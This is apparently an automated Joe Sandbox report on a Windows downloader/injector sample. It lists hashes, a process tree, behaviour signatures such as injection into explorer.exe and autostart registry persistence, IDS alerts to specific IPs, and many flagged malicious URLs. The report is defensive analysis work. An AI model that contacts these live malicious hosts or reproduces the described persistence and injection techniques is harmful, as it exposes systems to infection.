Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5SGOAKv7AR.exe

Overview

General Information

Sample name:5SGOAKv7AR.exe
renamed because original name is a hash value
Original sample name:Virus.Injector.ATA_virussign.com_36ec3a51b474cf8210bc02444a290499.exe
Analysis ID:1506041
MD5:36ec3a51b474cf8210bc02444a290499
SHA1:86f147291649382badbbea123bc94fbab1167770
SHA256:71d84a18e3cba7a496b6e2a4ab14ec7f6b5c82d7d9fa9b86863e23b7161886ce
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check for running processes (XOR)
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • 5SGOAKv7AR.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\5SGOAKv7AR.exe" MD5: 36EC3A51B474CF8210BC02444A290499)
    • edsuvoov-usum.exe (PID: 8004 cmdline: "C:\Windows\system32\edsuvoov-usum.exe" MD5: 36EC3A51B474CF8210BC02444A290499)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: B2AD768FF9A9DE3D886825A59DEF307A)
      • explorer.exe (PID: 640 cmdline: C:\Windows\Explorer.EXE MD5: 574AF6D80FE7CC6422A8592DE7A39F78)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: BB 12 51 95 2A 01 DB 01 F4 D8 AB 33 00 00 00 00 32 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\edsuvoov-usum.exe, ProcessId: 8004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy\Default Flags

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-09-07T15:34:00.578045+020028032702Potentially Bad Traffic192.168.2.349711172.234.222.13880TCP
2024-09-07T15:34:02.076876+020028032702Potentially Bad Traffic192.168.2.349714172.234.222.13880TCP
2024-09-07T15:34:03.385889+020028032702Potentially Bad Traffic192.168.2.349717172.234.222.13880TCP
2024-09-07T15:34:04.549358+020028032702Potentially Bad Traffic192.168.2.349720172.234.222.13880TCP
2024-09-07T15:34:07.602203+020028032702Potentially Bad Traffic192.168.2.349723172.234.222.13880TCP
2024-09-07T15:34:09.377835+020028032702Potentially Bad Traffic192.168.2.349727172.234.222.13880TCP
2024-09-07T15:34:10.782137+020028032702Potentially Bad Traffic192.168.2.349730172.234.222.13880TCP
2024-09-07T15:34:11.943025+020028032702Potentially Bad Traffic192.168.2.360144172.234.222.13880TCP
2024-09-07T15:34:14.444162+020028032702Potentially Bad Traffic192.168.2.360147172.234.222.13880TCP
2024-09-07T15:34:16.063797+020028032702Potentially Bad Traffic192.168.2.360150172.234.222.13880TCP
2024-09-07T15:34:17.710181+020028032702Potentially Bad Traffic192.168.2.360153172.234.222.13880TCP
2024-09-07T15:34:21.125373+020028032702Potentially Bad Traffic192.168.2.360156172.234.222.13880TCP
2024-09-07T15:34:22.269473+020028032702Potentially Bad Traffic192.168.2.360159172.234.222.13880TCP
2024-09-07T15:34:27.974081+020028032702Potentially Bad Traffic192.168.2.361353172.234.222.13880TCP
2024-09-07T15:34:29.285083+020028032702Potentially Bad Traffic192.168.2.361356172.234.222.13880TCP
2024-09-07T15:34:31.589262+020028032702Potentially Bad Traffic192.168.2.361359172.234.222.13880TCP
2024-09-07T15:34:33.497866+020028032702Potentially Bad Traffic192.168.2.361362172.234.222.13880TCP
2024-09-07T15:34:35.500892+020028032702Potentially Bad Traffic192.168.2.361365172.234.222.13880TCP
2024-09-07T15:34:37.722425+020028032702Potentially Bad Traffic192.168.2.361368172.234.222.13880TCP
2024-09-07T15:34:39.301067+020028032702Potentially Bad Traffic192.168.2.361371172.234.222.13880TCP
2024-09-07T15:34:40.427839+020028032702Potentially Bad Traffic192.168.2.361374172.234.222.13880TCP
2024-09-07T15:34:41.571898+020028032702Potentially Bad Traffic192.168.2.361377172.234.222.13880TCP
2024-09-07T15:34:44.768083+020028032702Potentially Bad Traffic192.168.2.361380172.234.222.13880TCP
2024-09-07T15:34:46.821951+020028032702Potentially Bad Traffic192.168.2.361383172.234.222.13880TCP
2024-09-07T15:34:47.972475+020028032702Potentially Bad Traffic192.168.2.361386172.234.222.13880TCP
2024-09-07T15:34:50.366734+020028032702Potentially Bad Traffic192.168.2.361390172.234.222.13880TCP
2024-09-07T15:34:52.160381+020028032702Potentially Bad Traffic192.168.2.361393172.234.222.13880TCP
2024-09-07T15:34:56.866690+020028032702Potentially Bad Traffic192.168.2.361396172.234.222.13880TCP
2024-09-07T15:34:57.993794+020028032702Potentially Bad Traffic192.168.2.361399172.234.222.13880TCP
2024-09-07T15:34:59.721753+020028032702Potentially Bad Traffic192.168.2.361402172.234.222.13880TCP
2024-09-07T15:35:00.943860+020028032702Potentially Bad Traffic192.168.2.361405172.234.222.13880TCP
2024-09-07T15:35:02.750202+020028032702Potentially Bad Traffic192.168.2.361408172.234.222.13880TCP
2024-09-07T15:35:08.437881+020028032702Potentially Bad Traffic192.168.2.361411172.234.222.13880TCP
2024-09-07T15:35:10.098969+020028032702Potentially Bad Traffic192.168.2.361414172.234.222.13880TCP
2024-09-07T15:35:12.355887+020028032702Potentially Bad Traffic192.168.2.361417172.234.222.13880TCP
2024-09-07T15:35:15.386927+020028032702Potentially Bad Traffic192.168.2.361420172.234.222.13880TCP
2024-09-07T15:35:16.535147+020028032702Potentially Bad Traffic192.168.2.361423172.234.222.13880TCP
2024-09-07T15:35:17.819038+020028032702Potentially Bad Traffic192.168.2.361426172.234.222.13880TCP
2024-09-07T15:35:19.003453+020028032702Potentially Bad Traffic192.168.2.361429172.234.222.13880TCP
2024-09-07T15:35:23.449138+020028032702Potentially Bad Traffic192.168.2.36143045.79.222.13880TCP
2024-09-07T15:35:24.469879+020028032702Potentially Bad Traffic192.168.2.361432172.234.222.13880TCP
2024-09-07T15:35:26.689706+020028032702Potentially Bad Traffic192.168.2.361435172.234.222.13880TCP
2024-09-07T15:35:29.328844+020028032702Potentially Bad Traffic192.168.2.361438172.234.222.13880TCP
2024-09-07T15:35:33.043803+020028032702Potentially Bad Traffic192.168.2.361441172.234.222.13880TCP
2024-09-07T15:35:36.181066+020028032702Potentially Bad Traffic192.168.2.361444172.234.222.13880TCP
2024-09-07T15:35:40.460196+020028032702Potentially Bad Traffic192.168.2.361447172.234.222.13880TCP
2024-09-07T15:35:41.302953+020028032702Potentially Bad Traffic192.168.2.36144845.79.222.13880TCP
2024-09-07T15:35:42.332876+020028032702Potentially Bad Traffic192.168.2.361450172.234.222.13880TCP
2024-09-07T15:35:43.516511+020028032702Potentially Bad Traffic192.168.2.361453172.234.222.13880TCP
2024-09-07T15:35:45.321573+020028032702Potentially Bad Traffic192.168.2.361456172.234.222.13880TCP
2024-09-07T15:35:46.486434+020028032702Potentially Bad Traffic192.168.2.361459172.234.222.13880TCP
2024-09-07T15:35:48.261478+020028032702Potentially Bad Traffic192.168.2.361462172.234.222.13880TCP
2024-09-07T15:35:49.878449+020028032702Potentially Bad Traffic192.168.2.361465172.234.222.13880TCP
2024-09-07T15:35:51.754983+020028032702Potentially Bad Traffic192.168.2.361468172.234.222.13880TCP
2024-09-07T15:35:52.920888+020028032702Potentially Bad Traffic192.168.2.361471172.234.222.13880TCP
2024-09-07T15:35:54.517786+020028032702Potentially Bad Traffic192.168.2.361474172.234.222.13880TCP
2024-09-07T15:35:55.708386+020028032702Potentially Bad Traffic192.168.2.361477172.234.222.13880TCP
2024-09-07T15:35:56.877125+020028032702Potentially Bad Traffic192.168.2.361480172.234.222.13880TCP
2024-09-07T15:36:00.341616+020028032702Potentially Bad Traffic192.168.2.361483172.234.222.13880TCP
2024-09-07T15:36:01.656642+020028032702Potentially Bad Traffic192.168.2.361486172.234.222.13880TCP
2024-09-07T15:36:02.760612+020028032702Potentially Bad Traffic192.168.2.361489172.234.222.13880TCP
2024-09-07T15:36:04.580917+020028032702Potentially Bad Traffic192.168.2.361492172.234.222.13880TCP
2024-09-07T15:36:06.523901+020028032702Potentially Bad Traffic192.168.2.361495172.234.222.13880TCP
2024-09-07T15:36:07.698145+020028032702Potentially Bad Traffic192.168.2.361498172.234.222.13880TCP
2024-09-07T15:36:08.904506+020028032702Potentially Bad Traffic192.168.2.361501172.234.222.13880TCP
2024-09-07T15:36:10.350393+020028032702Potentially Bad Traffic192.168.2.361504172.234.222.13880TCP
2024-09-07T15:36:12.124138+020028032702Potentially Bad Traffic192.168.2.361507172.234.222.13880TCP
2024-09-07T15:36:14.015052+020028032702Potentially Bad Traffic192.168.2.361510172.234.222.13880TCP
2024-09-07T15:36:15.961660+020028032702Potentially Bad Traffic192.168.2.361513172.234.222.13880TCP
2024-09-07T15:36:20.934077+020028032702Potentially Bad Traffic192.168.2.361516172.234.222.13880TCP
2024-09-07T15:36:22.805211+020028032702Potentially Bad Traffic192.168.2.361519172.234.222.13880TCP
2024-09-07T15:36:24.073471+020028032702Potentially Bad Traffic192.168.2.361522172.234.222.13880TCP
2024-09-07T15:36:25.284684+020028032702Potentially Bad Traffic192.168.2.361525172.234.222.13880TCP
2024-09-07T15:36:27.709918+020028032702Potentially Bad Traffic192.168.2.355700172.234.222.13880TCP
2024-09-07T15:36:30.147412+020028032702Potentially Bad Traffic192.168.2.355703172.234.222.13880TCP
2024-09-07T15:36:31.312671+020028032702Potentially Bad Traffic192.168.2.355706172.234.222.13880TCP
2024-09-07T15:36:32.991169+020028032702Potentially Bad Traffic192.168.2.355709172.234.222.13880TCP
2024-09-07T15:36:34.127889+020028032702Potentially Bad Traffic192.168.2.355712172.234.222.13880TCP
2024-09-07T15:36:35.299131+020028032702Potentially Bad Traffic192.168.2.355715172.234.222.13880TCP
2024-09-07T15:36:38.585530+020028032702Potentially Bad Traffic192.168.2.355718172.234.222.13880TCP
2024-09-07T15:36:39.885676+020028032702Potentially Bad Traffic192.168.2.355721172.234.222.13880TCP
2024-09-07T15:36:40.986444+020028032702Potentially Bad Traffic192.168.2.355724172.234.222.13880TCP
2024-09-07T15:36:42.632345+020028032702Potentially Bad Traffic192.168.2.355727172.234.222.13880TCP
2024-09-07T15:36:44.790160+020028032702Potentially Bad Traffic192.168.2.355730172.234.222.13880TCP
2024-09-07T15:36:45.909674+020028032702Potentially Bad Traffic192.168.2.355733172.234.222.13880TCP
2024-09-07T15:36:47.198197+020028032702Potentially Bad Traffic192.168.2.355736172.234.222.13880TCP
2024-09-07T15:36:48.573700+020028032702Potentially Bad Traffic192.168.2.355739172.234.222.13880TCP
2024-09-07T15:36:50.591502+020028032702Potentially Bad Traffic192.168.2.355742172.234.222.13880TCP
2024-09-07T15:36:52.192030+020028032702Potentially Bad Traffic192.168.2.355745172.234.222.13880TCP
2024-09-07T15:36:54.933972+020028032702Potentially Bad Traffic192.168.2.355475172.234.222.13880TCP
2024-09-07T15:37:00.392607+020028032702Potentially Bad Traffic192.168.2.356438172.234.222.13880TCP
2024-09-07T15:37:02.606729+020028032702Potentially Bad Traffic192.168.2.356441172.234.222.13880TCP
2024-09-07T15:37:03.738144+020028032702Potentially Bad Traffic192.168.2.356444172.234.222.13880TCP
2024-09-07T15:37:04.919872+020028032702Potentially Bad Traffic192.168.2.356447172.234.222.13880TCP
2024-09-07T15:37:07.129185+020028032702Potentially Bad Traffic192.168.2.356450172.234.222.13880TCP
2024-09-07T15:37:09.417507+020028032702Potentially Bad Traffic192.168.2.356453172.234.222.13880TCP
2024-09-07T15:37:10.582691+020028032702Potentially Bad Traffic192.168.2.356456172.234.222.13880TCP
2024-09-07T15:37:12.332661+020028032702Potentially Bad Traffic192.168.2.356459172.234.222.13880TCP
2024-09-07T15:37:13.466719+020028032702Potentially Bad Traffic192.168.2.356462172.234.222.13880TCP
2024-09-07T15:37:14.760158+020028032702Potentially Bad Traffic192.168.2.356465172.234.222.13880TCP
2024-09-07T15:37:18.225915+020028032702Potentially Bad Traffic192.168.2.356468172.234.222.13880TCP
2024-09-07T15:37:19.812830+020028032702Potentially Bad Traffic192.168.2.356471172.234.222.13880TCP
2024-09-07T15:37:20.960270+020028032702Potentially Bad Traffic192.168.2.356474172.234.222.13880TCP
2024-09-07T15:37:22.460561+020028032702Potentially Bad Traffic192.168.2.356477172.234.222.13880TCP
2024-09-07T15:37:24.627125+020028032702Potentially Bad Traffic192.168.2.356480172.234.222.13880TCP
2024-09-07T15:37:25.765520+020028032702Potentially Bad Traffic192.168.2.356483172.234.222.13880TCP
2024-09-07T15:37:26.912057+020028032702Potentially Bad Traffic192.168.2.356486172.234.222.13880TCP
2024-09-07T15:37:28.668216+020028032702Potentially Bad Traffic192.168.2.356489172.234.222.13880TCP
2024-09-07T15:37:30.435293+020028032702Potentially Bad Traffic192.168.2.356492172.234.222.13880TCP
2024-09-07T15:37:32.043608+020028032702Potentially Bad Traffic192.168.2.356495172.234.222.13880TCP
2024-09-07T15:37:34.291256+020028032702Potentially Bad Traffic192.168.2.356498172.234.222.13880TCP
2024-09-07T15:37:38.068355+020028032702Potentially Bad Traffic192.168.2.356501172.234.222.13880TCP
2024-09-07T15:37:40.208226+020028032702Potentially Bad Traffic192.168.2.356504172.234.222.13880TCP
2024-09-07T15:37:41.370321+020028032702Potentially Bad Traffic192.168.2.356507172.234.222.13880TCP
2024-09-07T15:37:42.473745+020028032702Potentially Bad Traffic192.168.2.356510172.234.222.13880TCP
2024-09-07T15:37:45.164000+020028032702Potentially Bad Traffic192.168.2.356513172.234.222.13880TCP
2024-09-07T15:37:47.582878+020028032702Potentially Bad Traffic192.168.2.356516172.234.222.13880TCP
2024-09-07T15:37:48.694007+020028032702Potentially Bad Traffic192.168.2.356519172.234.222.13880TCP
2024-09-07T15:37:50.394372+020028032702Potentially Bad Traffic192.168.2.356522172.234.222.13880TCP
2024-09-07T15:37:51.532926+020028032702Potentially Bad Traffic192.168.2.356525172.234.222.13880TCP
2024-09-07T15:37:52.699955+020028032702Potentially Bad Traffic192.168.2.356528172.234.222.13880TCP
2024-09-07T15:37:56.463532+020028032702Potentially Bad Traffic192.168.2.362902172.234.222.13880TCP
2024-09-07T15:37:58.068286+020028032702Potentially Bad Traffic192.168.2.362905172.234.222.13880TCP
2024-09-07T15:37:59.261504+020028032702Potentially Bad Traffic192.168.2.362908172.234.222.13880TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 5SGOAKv7AR.exeAvira: detected
Antivirus detection for URL or domain
Source: http://utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E23AAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE052Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC43Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC435D1Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411CAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828AAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51531Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFB92Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1DAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C94594822836BAvira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?028C86Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C1Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5DAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7Avira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D77Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E6Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593CAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F8649019Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?021685246B1185246B24850C6B1685AAB882BD8C311785E4C31486124524AB1D5926B50A6BAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED91150ECAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C2692FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7Avira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AFAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C46DAvira URL Cloud: Label: phishing
Source: http://wfnsamu.st/LAvira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449BAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5AAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0DE79Avira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0228E1FBA12FE1FBA11AE1D3A128E17572BCD953FB29E13B092AE2CD8F1ACFC29318D1D5A1Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53Avira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E16554Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553FAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902B62Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7379Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887Avira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?0216856Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8CAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404CAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02263F721B213F721B143F5A1B263FFCC8B207DA41273FB2B3243C443514114B29160F5C1BAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DFAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24Avira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDDAvira URL Cloud: Label: phishing
Source: http://ww99.utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFAvira URL Cloud: Label: phishing
Source: http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Windows\SysWOW64\ehmehut.dllAvira: detection malicious, Label: TR/Dldr.Agent.swim
Source: C:\Users\user\AppData\Roaming\tmp5C6F.tmpAvira: detection malicious, Label: TR/Downloader.Gen
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeAvira: detection malicious, Label: TR/Downloader.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\osgobah.dllReversingLabs: Detection: 41%
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeReversingLabs: Detection: 84%
Source: C:\Windows\SysWOW64\ehmehut.dllReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: 5SGOAKv7AR.exeVirustotal: Detection: 89%Perma Link
Source: 5SGOAKv7AR.exeReversingLabs: Detection: 84%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: 5SGOAKv7AR.exeJoe Sandbox ML: detected
Source: 5SGOAKv7AR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Networking

barindex
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: ocjaqgnsqfgp.mp replaycode: Name error (3)
Source: unknownDNS traffic detected: query: zitfawcgy.st replaycode: Name error (3)
